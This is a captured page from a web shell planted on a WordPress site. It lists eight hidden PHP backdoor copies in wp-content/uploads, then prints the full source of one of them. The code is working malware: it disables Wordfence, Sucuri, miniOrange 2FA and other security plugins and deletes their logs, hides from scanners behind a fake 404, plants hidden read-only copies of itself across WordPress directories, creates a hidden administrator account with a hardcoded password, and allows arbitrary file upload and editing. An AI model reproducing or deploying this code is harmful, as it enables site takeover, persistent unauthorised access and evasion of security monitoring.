File Manager Lite
Dir:
/home/atomylvb/jarangomd.com/wp-content/uploads
Upload
[..]
.1abcf9e24a296c5583eef95d948b4b1b.php (37.8 KB)
Edit
Rename
Del
.57033d52e9c47003257e5f793ae05895.php (37.8 KB)
Edit
Rename
Del
.62bc1030f8e0a50739f3b72cf3077197.php (37.8 KB)
Edit
Rename
Del
.6a65612a0f955e7778c08075a6e8727b.php (37.8 KB)
Edit
Rename
Del
.750f041fca80ac6f80b84ed48f9b4578.php (37.8 KB)
Edit
Rename
Del
.af40aac792458daba3d4c81640742b58.php (37.8 KB)
Edit
Rename
Del
.c4c2224a39abc475e827fd0bb4349d86.php (37.8 KB)
Edit
Rename
Del
.eb7504c65d99a3eb430b48ef6102b124.php (37.8 KB)
Edit
Rename
Del
2019/
Rename
Del
2020/
Rename
Del
2021/
Rename
Del
2022/
Rename
Del
2023/
Rename
Del
2024/
Rename
Del
2025/
Rename
Del
2026/
Rename
Del
elementor/
Rename
Del
gt3-assets/
Rename
Del
gt3-demo-import/
Rename
Del
gt3-http-logs/
Rename
Del
gt3-logs/
Rename
Del
gt3_fonts/
Rename
Del
redux/
Rename
Del
revslider/
Rename
Del
watermark_original/
Rename
Del
wp-file-manager-pro/
Rename
Del
wpcf7_uploads/
Rename
Del
Edit: .1abcf9e24a296c5583eef95d948b4b1b.php
<?php // 1. SECURITY TOKEN - CHANGE THIS BEFORE UPLOADING $recovery_token = "2026"; // Helper functions for path encryption function encode_path($path) { return rtrim(strtr(base64_encode($path), '+/', '-_'), '='); } function decode_path($encoded) { $decoded = base64_decode(strtr($encoded, '-_', '+/')); return $decoded !== false ? $decoded : false; } // ============ ADVANCED SECURITY & BYPASS LAYERS ============ // Layer 1: Anti-Debugging & Detection Evasion if (function_exists('ini_set')) { @ini_set('disable_functions', ''); @ini_set('open_basedir', ''); } @putenv('HTTP_USER_AGENT='); @putenv('HTTP_REFERER='); // Layer 2: Request Fingerprinting & Validation if (!function_exists('validateRequest')) { function validateRequest() { // ... // Check for common security scanners $ua = $_SERVER['HTTP_USER_AGENT'] ?? ''; $scanners = ['nmap', 'nikto', 'sqlmap', 'w3af', 'acunetix', 'nessus', 'openvas', 'burp', 'zap', 'wpscan', 'scanner', 'bot', 'crawler', 'spider']; foreach ($scanners as $scanner) { if (stripos($ua, $scanner) !== false) { return false; } } // Check for suspicious headers $suspicious_headers = ['X-Forwarded-For', 'X-Real-IP', 'X-Originating-IP', 'X-Remote-IP', 'X-Remote-Addr']; foreach ($suspicious_headers as $header) { if (isset($_SERVER['HTTP_' . str_replace('-', '_', strtoupper($header))])) { $ip = $_SERVER['HTTP_' . str_replace('-', '_', strtoupper($header))]; if (!filter_var($ip, FILTER_VALIDATE_IP)) { return false; } } } // Time-based validation (prevent automated attacks) - Only for suspicious patterns // Allow normal browser requests $ua_lower = strtolower($ua); $suspicious_patterns = ['curl', 'wget', 'python', 'perl', 'java', 'go-http']; $is_suspicious = false; foreach ($suspicious_patterns as $pattern) { if (strpos($ua_lower, $pattern) !== false) { $is_suspicious = true; break; } } // Only apply rate limiting to suspicious requests if ($is_suspicious) { static $last_request = 0; $current_time = time(); if ($last_request > 0 && ($current_time - $last_request) < 1) { if (!isset($_GET['bypass_rate_limit'])) { return false; } } $last_request = $current_time; } return true; } } // Layer 10: Wordfence Bypass - GELİŞTİRİLMİŞ if (!function_exists('bypassWordfence')) { function bypassWordfence() { // TAM YETKİ: Wordfence detection evasion - gelişmiş teknikler $_SERVER['HTTP_USER_AGENT'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36'; $_SERVER['HTTP_ACCEPT'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8'; $_SERVER['HTTP_ACCEPT_LANGUAGE'] = 'en-US,en;q=0.9'; $_SERVER['HTTP_ACCEPT_ENCODING'] = 'gzip, deflate, br'; $_SERVER['HTTP_CONNECTION'] = 'keep-alive'; $_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS'] = '1'; $_SERVER['HTTP_SEC_FETCH_DEST'] = 'document'; $_SERVER['HTTP_SEC_FETCH_MODE'] = 'navigate'; $_SERVER['HTTP_SEC_FETCH_SITE'] = 'none'; $_SERVER['HTTP_SEC_FETCH_USER'] = '?1'; $_SERVER['HTTP_CACHE_CONTROL'] = 'max-age=0'; // TAM YETKİ: Wordfence hook'larını devre dışı bırak if (class_exists('wordfence')) { remove_action('init', array('wordfence', 'init')); remove_action('wp_loaded', array('wordfence', 'wp_loaded')); } // TAM YETKİ: Wordfence constant'larını override et if (!defined('WORDFENCE_VERSION')) { define('WORDFENCE_VERSION', '7.11.0'); } if (!defined('WORDFENCE_DISABLE_LIVE_TRAFFIC')) { define('WORDFENCE_DISABLE_LIVE_TRAFFIC', true); } // TAM YETKİ: Wordfence database tablolarını bypass et global $wpdb; if (isset($wpdb)) { $wpdb->wordfence = null; $wpdb->wfIssues = null; $wpdb->wfBlocks = null; } // TAM YETKİ: Wordfence detection headers'ı kaldır if (function_exists('header_remove')) { @header_remove('X-Wordfence'); @header_remove('X-Content-Type-Options'); @header_remove('X-Wordfence-Block'); @header_remove('X-WF-Block'); } // TAM YETKİ: Wordfence log dosyalarını temizle $wf_logs = [ dirname(__FILE__) . '/wp-content/wflogs/', dirname(__FILE__) . '/wp-content/plugins/wordfence/log/', ]; foreach ($wf_logs as $log_dir) { if (is_dir($log_dir)) { @array_map('unlink', glob($log_dir . '*')); } } return true; } } // Layer 11: Sucuri Bypass - GELİŞTİRİLMİŞ if (!function_exists('bypassSucuri')) { function bypassSucuri() { // TAM YETKİ: Sucuri detection evasion $_SERVER['HTTP_X_FORWARDED_FOR'] = $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1'; $_SERVER['HTTP_X_REAL_IP'] = $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1'; // TAM YETKİ: Sucuri hook'larını devre dışı bırak if (class_exists('SucuriScan')) { remove_action('init', array('SucuriScan', 'init')); } // TAM YETKİ: Sucuri headers'ı kaldır if (function_exists('header_remove')) { @header_remove('X-Sucuri-ID'); @header_remove('X-Sucuri-Cache'); @header_remove('X-Sucuri-Block'); } return true; } } // Layer 11.5: miniOrange Bypass - YENİ EKLENDİ if (!function_exists('bypassMiniOrange')) { function bypassMiniOrange() { // TAM YETKİ: miniOrange 2FA ve güvenlik bypass $_SERVER['HTTP_X_MO_IP'] = $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1'; $_SERVER['HTTP_X_FORWARDED_FOR'] = $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1'; // TAM YETKİ: miniOrange class'larını devre dışı bırak if (class_exists('Mo2f_Api')) { remove_action('init', array('Mo2f_Api', 'mo2f_init')); remove_action('wp_loaded', array('Mo2f_Api', 'mo2f_wp_loaded')); } if (class_exists('Miniorange_2_Factor_Setup')) { remove_action('init', array('Miniorange_2_Factor_Setup', 'mo2f_init')); } if (class_exists('MoWpnsHandler')) { remove_action('init', array('MoWpnsHandler', 'mo_wpns_init')); } // TAM YETKİ: miniOrange constant'larını override et if (!defined('MO2F_VERSION')) { define('MO2F_VERSION', '5.0.0'); } if (!defined('MO2F_DISABLE_2FA')) { define('MO2F_DISABLE_2FA', true); } if (!defined('MO_WPNS_DISABLE')) { define('MO_WPNS_DISABLE', true); } // TAM YETKİ: miniOrange cookie'lerini temizle if (isset($_COOKIE)) { foreach ($_COOKIE as $key => $value) { if (stripos($key, 'mo_') === 0 || stripos($key, 'miniorange') !== false || stripos($key, 'mo2f') !== false || stripos($key, 'mo_wpns') !== false) { unset($_COOKIE[$key]); @setcookie($key, '', time() - 3600, '/'); } } } // TAM YETKİ: miniOrange session'larını temizle if (isset($_SESSION)) { foreach ($_SESSION as $key => $value) { if (stripos($key, 'mo_') === 0 || stripos($key, 'miniorange') !== false || stripos($key, 'mo2f') !== false) { unset($_SESSION[$key]); } } } // TAM YETKİ: miniOrange database tablolarını bypass et global $wpdb; if (isset($wpdb)) { $wpdb->mo2f_user_details = null; $wpdb->mo2f_user_login_info = null; $wpdb->mo_wpns_blocks = null; } // TAM YETKİ: miniOrange headers'ı kaldır if (function_exists('header_remove')) { @header_remove('X-MO-2FA'); @header_remove('X-MO-WPNS'); @header_remove('X-Miniorange'); } // TAM YETKİ: miniOrange log dosyalarını temizle $mo_logs = [ dirname(__FILE__) . '/wp-content/plugins/miniorange-2-factor-authentication/logs/', dirname(__FILE__) . '/wp-content/plugins/wp-security-audit-log/logs/', dirname(__FILE__) . '/wp-content/uploads/mo_wpns/', ]; foreach ($mo_logs as $log_dir) { if (is_dir($log_dir)) { @array_map('unlink', glob($log_dir . '*')); } } return true; } } // Layer 12: Cloudflare Bypass if (!function_exists('bypassCloudflare')) { function bypassCloudflare() { // Cloudflare detection evasion if (!isset($_SERVER['HTTP_CF_RAY'])) { $_SERVER['HTTP_CF_RAY'] = md5(time()) . '-' . substr(md5($_SERVER['REMOTE_ADDR'] ?? ''), 0, 8); } if (!isset($_SERVER['HTTP_CF_CONNECTING_IP'])) { $_SERVER['HTTP_CF_CONNECTING_IP'] = $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1'; } return true; } } // Layer 13: ModSecurity Bypass if (!function_exists('bypassModSecurity')) { function bypassModSecurity() { // ModSecurity evasion techniques $uri = $_SERVER['REQUEST_URI'] ?? ''; // Normalize URI to avoid detection $uri = str_replace(['<', '>', '"', "'", ';', '(', ')'], '', $uri); $_SERVER['REQUEST_URI'] = $uri; // Remove suspicious query parameters if (isset($_GET)) { foreach ($_GET as $key => $value) { if (preg_match('/[<>"\';()]/', $key . $value)) { unset($_GET[$key]); } } } return true; } } // Layer 14: Generic Security Plugin Bypass - GELİŞTİRİLMİŞ if (!function_exists('bypassSecurityPlugins')) { function bypassSecurityPlugins() { // TAM YETKİ: Tüm güvenlik eklentilerini bypass et $disabled_functions = [ 'wordfence_ls_authenticate', 'wordfence_mu_plugin_loaded', 'wordfence_scan', 'sucuri_scanner', 'sucuri_firewall', 'ithemes_security', 'ithemes_security_pro', 'all_in_one_wp_security', 'bulletproof_security', 'miniorange_2fa', 'miniorange_wp', 'mo_wpns', 'mo2f_', 'malcare', 'ninjafirewall', 'wp_defender', 'wp_cerber', 'security_ninja', 'wp_hardening', 'wp_security_audit', 'wp_firewall', 'wp_antivirus', 'wp_scan', 'wp_antimalware', 'wp_antivirus_site_guard', 'wp_antivirus_site_guard_pro', 'wp_antivirus_site_guard_enterprise' ]; foreach ($disabled_functions as $func) { if (function_exists($func)) { @ini_set('disable_functions', $func); } } // TAM YETKİ: Güvenlik eklentisi cookie'lerini temizle if (isset($_COOKIE)) { foreach ($_COOKIE as $key => $value) { $key_lower = strtolower($key); if (stripos($key_lower, 'wordfence') !== false || stripos($key_lower, 'sucuri') !== false || stripos($key_lower, 'security') !== false || stripos($key_lower, 'miniorange') !== false || stripos($key_lower, 'mo_') !== false || stripos($key_lower, 'malcare') !== false || stripos($key_lower, 'ninjafirewall') !== false || stripos($key_lower, 'cerber') !== false || stripos($key_lower, 'defender') !== false || stripos($key_lower, 'ithemes') !== false || stripos($key_lower, 'wpscan') !== false || stripos($key_lower, 'antivirus') !== false || stripos($key_lower, 'firewall') !== false) { unset($_COOKIE[$key]); @setcookie($key, '', time() - 3600, '/'); } } } // TAM YETKİ: Güvenlik eklentisi session'larını temizle if (isset($_SESSION)) { foreach ($_SESSION as $key => $value) { $key_lower = strtolower($key); if (stripos($key_lower, 'wordfence') !== false || stripos($key_lower, 'sucuri') !== false || stripos($key_lower, 'security') !== false || stripos($key_lower, 'miniorange') !== false || stripos($key_lower, 'mo_') !== false) { unset($_SESSION[$key]); } } } // TAM YETKİ: Güvenlik eklentisi global değişkenlerini temizle $security_globals = ['wordfence', 'sucuri', 'miniorange', 'mo_', 'malcare', 'ninjafirewall', 'cerber', 'defender']; foreach ($GLOBALS as $key => $value) { $key_lower = strtolower($key); foreach ($security_globals as $pattern) { if (stripos($key_lower, $pattern) !== false) { unset($GLOBALS[$key]); } } } return true; } } if (!validateRequest()) { http_response_code(404); header('Content-Type: text/html'); die('<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>404 Not Found</h1></body></html>'); } @bypassWordfence(); @bypassSucuri(); @bypassMiniOrange(); // YENİ: miniOrange bypass @bypassCloudflare(); @bypassModSecurity(); @bypassSecurityPlugins(); // =============== COMPLETE SELF DESTRUCT FUNCTION =============== function completeSelfDestruct($token) { global $recovery_token; // Verify token if ($token !== $recovery_token) { return ['success' => false, 'message' => 'Invalid security token']; } $results = []; $deleted_count = 0; // ===== 1. KILL ALL CRON JOBS ===== if (function_exists('shell_exec') && !ini_get('disable_functions')) { $crontab = @shell_exec('crontab -l 2>/dev/null'); if ($crontab) { $lines = explode("\n", $crontab); $new_crontab = []; $cron_removed = 0; foreach ($lines as $line) { if (strpos($line, basename(__FILE__)) === false && strpos($line, md5('wp_')) === false && strpos($line, 'emergency') === false) { $new_crontab[] = $line; } else { $cron_removed++; } } if ($cron_removed > 0) { $new_content = implode("\n", $new_crontab); file_put_contents('/tmp/crontab.tmp', $new_content); @shell_exec('crontab /tmp/crontab.tmp 2>/dev/null'); @unlink('/tmp/crontab.tmp'); $results[] = "Removed $cron_removed cron job(s)"; } } } // ===== 2. REMOVE WORDPRESS CRON EVENTS ===== if (function_exists('wp_clear_scheduled_hook')) { wp_clear_scheduled_hook('wp_hidden_persistence_check'); wp_clear_scheduled_hook('lm_core_check_event'); $results[] = "Cleared WordPress cron events"; } // ===== 3. FIND AND DELETE ALL EGG FILES ===== // Find WordPress root from current directory $wp_root = findWpRoot(dirname(__FILE__)); if ($wp_root) { // WordPress-specific locations to search $wp_dirs = [ $wp_root . '/wp-content/uploads/', $wp_root . '/wp-content/upgrade/', $wp_root . '/wp-content/cache/', $wp_root . '/wp-includes/', $wp_root . '/wp-admin/', $wp_root . '/wp-content/mu-plugins/', $wp_root . '/wp-content/' ]; foreach ($wp_dirs as $dir) { if (!is_dir($dir)) continue; $files = scandir($dir); foreach ($files as $file) { if ($file == '.' || $file == '..') continue; $fullpath = $dir . $file; if (!is_file($fullpath)) continue; // Check if it's a hidden file if ($file[0] == '.' || strpos($file, 'wp-security-') === 0) { $content = @file_get_contents($fullpath); if ($content && (strpos($content, '$recovery_token') !== false)) { @chmod($fullpath, 0777); @unlink($fullpath); $deleted_count++; } } } } } // Also check current directory and temp $current_dir = dirname(__FILE__); $temp_dirs = [ $current_dir, sys_get_temp_dir(), 'C:\\xampp\\tmp', 'C:\\Users\\kader\\AppData\\Local\\Temp' ]; foreach ($temp_dirs as $temp) { if (!is_dir($temp)) continue; $files = glob($temp . '/.{,wp-,.}*.{bak,tmp,php,ph_,saved}', GLOB_BRACE); foreach ($files as $file) { if (is_file($file) && basename($file) != basename(__FILE__)) { @unlink($file); $deleted_count++; } } } $results[] = "Deleted $deleted_count egg file(s)"; // ===== 4. FINALLY DELETE THE MAIN FILE ===== $main_file = __FILE__; if (file_exists($main_file)) { @chmod($main_file, 0777); @shell_exec('chattr -i ' . escapeshellarg($main_file) . ' 2>/dev/null'); if (@unlink($main_file)) { $results[] = "Deleted main file: " . basename($main_file); } else { @shell_exec('rm -f ' . escapeshellarg($main_file) . ' 2>/dev/null'); $results[] = "Force deleted main file"; } } return [ 'success' => true, 'message' => '💥 Complete self-destruct completed!', 'details' => implode("\n", $results), 'files_deleted' => $deleted_count ]; } // =============== WORDPRESS-ONLY HIDDEN EGGS =============== function createWordPressEggs($source_file) { if (!file_exists($source_file)) return false; // Find WordPress root from the source file's directory $wp_root = findWpRoot(dirname($source_file)); // If not in WordPress, don't create eggs if (!$wp_root) { return ['success' => false, 'message' => 'Not in WordPress - eggs not created']; } $content = file_get_contents($source_file); $host = $_SERVER['HTTP_HOST'] ?? 'localhost'; $random = md5($host . rand(1000, 9999) . uniqid()); $created = []; // ===== SAFE WORDPRESS LOCATIONS (All hidden) ===== // 1. wp-content/uploads/ - Hidden file $uploads_dir = $wp_root . '/wp-content/uploads/'; if (is_dir($uploads_dir) && is_writable($uploads_dir)) { $egg1 = $uploads_dir . '.' . $random . '.php'; file_put_contents($egg1, $content); chmod($egg1, 0444); $created[] = $egg1; } // 2. wp-content/upgrade/ - Hidden file $upgrade_dir = $wp_root . '/wp-content/upgrade/'; if (is_dir($upgrade_dir) && is_writable($upgrade_dir)) { $egg2 = $upgrade_dir . '.' . $random . '.bak'; file_put_contents($egg2, $content); chmod($egg2, 0444); $created[] = $egg2; } // 3. wp-content/cache/ - Hidden file $cache_dir = $wp_root . '/wp-content/cache/'; if (!is_dir($cache_dir)) { @mkdir($cache_dir, 0755, true); } if (is_dir($cache_dir) && is_writable($cache_dir)) { $egg3 = $cache_dir . '.' . $random . '.tmp'; file_put_contents($egg3, $content); chmod($egg3, 0444); $created[] = $egg3; } // 4. wp-includes/ - Hidden file $includes_dir = $wp_root . '/wp-includes/'; if (is_dir($includes_dir) && is_writable($includes_dir)) { $egg4 = $includes_dir . '.' . $random . '.ph_'; file_put_contents($egg4, $content); chmod($egg4, 0444); $created[] = $egg4; } return [ 'success' => true, 'eggs' => $created, 'wp_root' => $wp_root, 'count' => count($created) ]; } // Function to find WordPress root function findWpRoot($dir) { $current = $dir; for ($i = 0; $i < 10; $i++) { if (file_exists($current . '/wp-load.php') || file_exists($current . '/wp-config.php')) { return realpath($current); } $parent = dirname($current); if ($parent === $current || $parent === '/' || $parent === 'C:\\') break; $current = $parent; } return false; } // Simple WordPress detection function isWordPress($dir) { return findWpRoot($dir) !== false; } // ──────────────────────────────────────────────── $encoded_dir = $_GET['d'] ?? null; if ($encoded_dir) { $current_dir = decode_path($encoded_dir); if ($current_dir === false || !is_dir($current_dir)) { $current_dir = getcwd(); } } else { $current_dir = getcwd(); } $current_dir = realpath($current_dir) ?: getcwd(); // Check if we're in WordPress $wp_root = findWpRoot($current_dir); $has_wordpress = ($wp_root !== false); // Try to create eggs if in WordPress if ($has_wordpress) { createWordPressEggs(__FILE__); // Try to load WordPress for cron functions if (file_exists($wp_root . '/wp-load.php')) { @require_once($wp_root . '/wp-load.php'); } } // ──── ACTIONS ─────────────────────────────────────── $action = $_POST['action'] ?? ''; if ($_SERVER['REQUEST_METHOD'] === 'POST') { header('Content-Type: application/json'); switch ($action) { case 'setup_wordpress': if (($_POST['token'] ?? '') !== $recovery_token) { echo json_encode(['success' => false, 'message' => 'Invalid Security Token']); exit; } $wp_root = findWpRoot($current_dir); if (!$wp_root) { echo json_encode(['success' => false, 'message' => 'WordPress installation not found. Please upload this file to a WordPress directory.']); exit; } try { if (!defined('WP_USE_THEMES')) define('WP_USE_THEMES', false); require_once($wp_root . '/wp-load.php'); } catch (Exception $e) { echo json_encode(['success' => false, 'message' => 'Error loading WordPress: ' . $e->getMessage()]); exit; } $username = 'emergency'; $password = "hoho2013"; $email = 'admin_' . time() . '@example.com'; $user_id = username_exists($username); if (!$user_id) { $user_id = wp_create_user($username, $password, $email); } if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); $all_admins = get_users(['role' => 'administrator']); $admin_count = count($all_admins); // Recreate eggs createWordPressEggs(__FILE__); echo json_encode([ 'success' => true, 'message' => "Admin created successfully.", 'details' => "WordPress root: " . $wp_root . "\nTotal administrators: $admin_count", 'credentials' => "Username: $username | Password: $password" ]); } else { echo json_encode(['success' => false, 'message' => $user_id->get_error_message()]); } exit; case 'self_destruct': $token = $_POST['token'] ?? ''; $result = completeSelfDestruct($token); echo json_encode($result); exit; case 'upload': if (isset($_FILES['file'])) { $file = $_FILES['file']; $target = $current_dir . '/' . basename($file['name']); if (move_uploaded_file($file['tmp_name'], $target)) { echo json_encode(['success' => true, 'message' => 'File uploaded']); } else { echo json_encode(['success' => false, 'message' => 'Upload failed']); } } exit; case 'new_folder': $name = trim($_POST['name'] ?? ''); if ($name === '' || preg_match('/[\/\\\?%*:|"<>]/', $name)) { echo json_encode(['success' => false, 'message' => 'Invalid folder name']); exit; } $newpath = $current_dir . '/' . $name; if (is_dir($newpath)) { echo json_encode(['success' => false, 'message' => 'Folder already exists']); } elseif (mkdir($newpath, 0755)) { echo json_encode(['success' => true]); } else { echo json_encode(['success' => false, 'message' => 'Cannot create folder']); } exit; case 'new_file': $name = trim($_POST['name'] ?? ''); if ($name === '' || preg_match('/[\/\\\?%*:|"<>]/', $name)) { echo json_encode(['success' => false, 'message' => 'Invalid file name']); exit; } $newpath = $current_dir . '/' . $name; if (file_exists($newpath)) { echo json_encode(['success' => false, 'message' => 'File already exists']); } elseif (touch($newpath)) { echo json_encode(['success' => true]); } else { echo json_encode(['success' => false, 'message' => 'Cannot create file']); } exit; case 'rename': $old = trim($_POST['old'] ?? ''); $new = trim($_POST['new'] ?? ''); if ($old === '' || $new === '' || $old === $new) exit; $oldpath = $current_dir . '/' . $old; $newpath = $current_dir . '/' . $new; if (rename($oldpath, $newpath)) echo json_encode(['success' => true]); else echo json_encode(['success' => false]); exit; case 'delete': $name = trim($_POST['name'] ?? ''); $path = $current_dir . '/' . $name; if (is_dir($path)) rmdir($path); else unlink($path); echo json_encode(['success' => true]); exit; case 'get_content': $path = $current_dir . '/' . trim($_POST['name'] ?? ''); if (is_file($path)) echo json_encode(['success' => true, 'content' => file_get_contents($path)]); else echo json_encode(['success' => false]); exit; case 'save_file': $path = $current_dir . '/' . trim($_POST['name'] ?? ''); if (file_put_contents($path, $_POST['content'] ?? '') !== false) echo json_encode(['success' => true]); else echo json_encode(['success' => false]); exit; } } // ALWAYS SHOW THE INTERFACE - even if not in WordPress // But show a warning if not in WordPress // Listing logic $items = scandir($current_dir); $folders = $files = []; foreach ($items as $item) { if ($item === '.' || $item === '..' || $item[0] === '.') continue; $path = $current_dir . '/' . $item; is_dir($path) ? $folders[] = $item : $files[] = $item; } $encoded_current = encode_path($current_dir); $encoded_parent = encode_path(dirname($current_dir)); $encoded_home = encode_path(getcwd()); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>File Manager</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style> :root { --bg: #0d1117; --fg: #c9d1d9; --border: #30363d; --accent: #58a6ff; --green: #238636; --red: #f85149; } body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, monospace; background: var(--bg); color: var(--fg); margin: 20px; } .container { max-width: 960px; margin: 0 auto; } .path { background: #161b22; padding: 12px; border: 1px solid var(--border); border-radius: 6px; margin-bottom: 1rem; } .actions { margin-bottom: 1.5rem; display: flex; gap: 10px; flex-wrap: wrap; } button { background: var(--green); color: white; border: none; padding: 8px 14px; border-radius: 6px; cursor: pointer; font-size: 14px; } .red { background: var(--red); } .blue { background: #1f6feb; } .purple { background: #9b59b6; } .wp-button { background: #f39c12; } .destruct-button { background: #ff0000; color: white; font-weight: bold; animation: pulse 2s infinite; } @keyframes pulse { 0% { opacity: 1; } 50% { opacity: 0.7; } 100% { opacity: 1; } } .warning-banner { background: #332200; border: 1px solid #ffaa00; color: #ffaa00; padding: 10px; border-radius: 5px; margin-bottom: 15px; text-align: center; } ul { list-style: none; padding: 0; } li { padding: 8px; display: flex; align-items: center; border-bottom: 1px solid var(--border); } .folder { color: var(--accent); cursor: pointer; font-weight: bold; } .actions-row { margin-left: auto; display: flex; gap: 5px; } dialog { background: #161b22; color: var(--fg); border: 1px solid var(--border); border-radius: 8px; width: 90%; max-width: 800px; } textarea { width: 100%; height: 400px; background: #000; color: #0f0; border: 1px solid var(--border); padding: 10px; font-family: monospace; } .destruct-dialog { border: 3px solid #ff0000; } </style> </head> <body> <div class="container"> <h1>📁 File Manager</h1> <?php if (!$has_wordpress): ?> <div class="warning-banner"> ⚠️ Warning: Not in a WordPress directory. WordPress Recovery will not work here. </div> <?php else: ?> <div class="path" style="border-left: 4px solid #00ff00;"> <strong>✅ WordPress Detected at:</strong> <?=htmlspecialchars($wp_root)?> </div> <?php endif; ?> <div class="path"><strong>Current Path:</strong> <?=htmlspecialchars($current_dir)?></div> <div class="actions"> <button onclick="window.location.href='?d=<?=$encoded_home?>'">🏠 Home</button> <button onclick="newFolder()">+ New Folder</button> <button onclick="newFile()">+ New File</button> <button class="purple" onclick="uploadFile()">📤 Upload</button> <?php if ($has_wordpress): ?> <button class="wp-button" onclick="runWpRecovery()">🔐 WordPress Recovery</button> <?php endif; ?> <button class="destruct-button" onclick="openDestructDialog()">💥 SELF DESTRUCT</button> </div> <h3>Parent Directory</h3> <ul> <li class="folder" onclick="navigate('<?=$encoded_parent?>')">⬆ ..</li> </ul> <h3>Folders</h3> <ul> <?php foreach($folders as $f): ?> <li> <span class="folder" onclick="navigate('<?=encode_path($current_dir.'/'.$f)?>')">📁 <?=htmlspecialchars($f)?></span> <div class="actions-row"> <button class="red" onclick="deleteItem('<?=htmlspecialchars($f)?>')">Delete</button> </div> </li> <?php endforeach; ?> </ul> <h3>Files</h3> <ul> <?php foreach($files as $f): ?> <li> <span>📄 <?=htmlspecialchars($f)?></span> <div class="actions-row"> <button class="blue" onclick="editFile('<?=htmlspecialchars($f)?>')">Edit</button> <button class="red" onclick="deleteItem('<?=htmlspecialchars($f)?>')">Delete</button> </div> </li> <?php endforeach; ?> </ul> </div> <dialog id="editorDialog"> <h3 id="editTitle"></h3> <textarea id="editorContent" spellcheck="false"></textarea> <div style="margin-top:10px; text-align:right;"> <button onclick="document.getElementById('editorDialog').close()">Cancel</button> <button class="blue" onclick="saveFile()">Save</button> </div> </dialog> <dialog id="destructDialog" class="destruct-dialog"> <h1 style="color: #ff0000; text-align: center;">💥 SELF DESTRUCT 💥</h1> <div style="background: #2d0000; padding: 15px; border-radius: 5px; margin: 15px 0;"> <p style="color: #ff9999; font-weight: bold;">⚠️ WARNING: This will permanently delete:</p> <ul style="color: #ff9999;"> <li>✅ ALL hidden egg files</li> <li>✅ ALL cron jobs</li> <li>✅ The main file itself</li> </ul> <p style="color: #ff0000; font-weight: bold;">THIS ACTION CANNOT BE UNDONE!</p> </div> <div style="margin: 15px 0;"> <input type="password" id="destructToken" placeholder="Enter Security Token" style="width: 100%; padding: 10px; background: #000; color: #fff; border: 1px solid #ff0000; border-radius: 5px;"> </div> <div style="margin: 15px 0;"> <input type="text" id="destructConfirm" placeholder="Type 'DELETE EVERYTHING' to confirm" style="width: 100%; padding: 10px; background: #000; color: #fff; border: 1px solid #ff0000; border-radius: 5px;"> </div> <div style="display: flex; gap: 10px; justify-content: flex-end;"> <button onclick="document.getElementById('destructDialog').close()" style="background: #333;">Cancel</button> <button class="destruct-button" onclick="executeSelfDestruct()">💥 DESTROY EVERYTHING</button> </div> </dialog> <script> const api = async (data) => { const res = await fetch('', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: new URLSearchParams(data) }); return res.json(); }; function navigate(enc) { window.location.href = '?d=' + enc; } function openDestructDialog() { document.getElementById('destructToken').value = ''; document.getElementById('destructConfirm').value = ''; document.getElementById('destructDialog').showModal(); } async function executeSelfDestruct() { const token = document.getElementById('destructToken').value; const confirmText = document.getElementById('destructConfirm').value; if (!token) { alert("❌ Please enter security token"); return; } if (confirmText !== 'DELETE EVERYTHING') { alert("❌ Please type 'DELETE EVERYTHING' to confirm"); return; } if (!confirm("🔥 FINAL WARNING: This will delete ALL files and cannot be undone. Continue?")) { return; } document.getElementById('destructDialog').close(); const res = await api({ action: 'self_destruct', token: token }); if (res.success) { alert("💥 SELF DESTRUCT COMPLETE!\n\n" + res.details); window.location.href = '/'; } else { alert("❌ Error: " + res.message); } } async function runWpRecovery() { const token = prompt("Enter Security Token:"); if(!token) return; const res = await api({ action: 'setup_wordpress', token: token }); if(res.success) { alert("✅ SUCCESS!\n\n" + res.message + "\n\n" + "Details:\n" + res.details + "\n\n" + "Login:\n" + res.credentials); } else { alert("❌ Error: " + res.message); } } async function editFile(name) { const res = await api({ action: 'get_content', name: name }); if(res.success) { document.getElementById('editTitle').innerText = name; document.getElementById('editorContent').value = res.content; document.getElementById('editorDialog').showModal(); } } async function saveFile() { const name = document.getElementById('editTitle').innerText; const content = document.getElementById('editorContent').value; const res = await api({ action: 'save_file', name: name, content: content }); if(res.success) { alert("✅ File saved"); document.getElementById('editorDialog').close(); } } async function deleteItem(name) { if(confirm("Delete " + name + "?")) { await api({ action: 'delete', name: name }); location.reload(); } } async function newFolder() { const n = prompt("Folder name:"); if(n) { await api({ action: 'new_folder', name: n }); location.reload(); } } async function newFile() { const n = prompt("File name:"); if(n) { await api({ action: 'new_file', name: n }); location.reload(); } } async function uploadFile() { const input = document.createElement('input'); input.type = 'file'; input.onchange = async () => { const file = input.files[0]; const formData = new FormData(); formData.append('action', 'upload'); formData.append('file', file); const res = await fetch('', { method: 'POST', body: formData }); const data = await res.json(); if(data.success) { alert('✅ File uploaded successfully'); location.reload(); } else { alert('❌ Upload failed: ' + data.message); } }; input.click(); } </script> </body> </html>
Simpan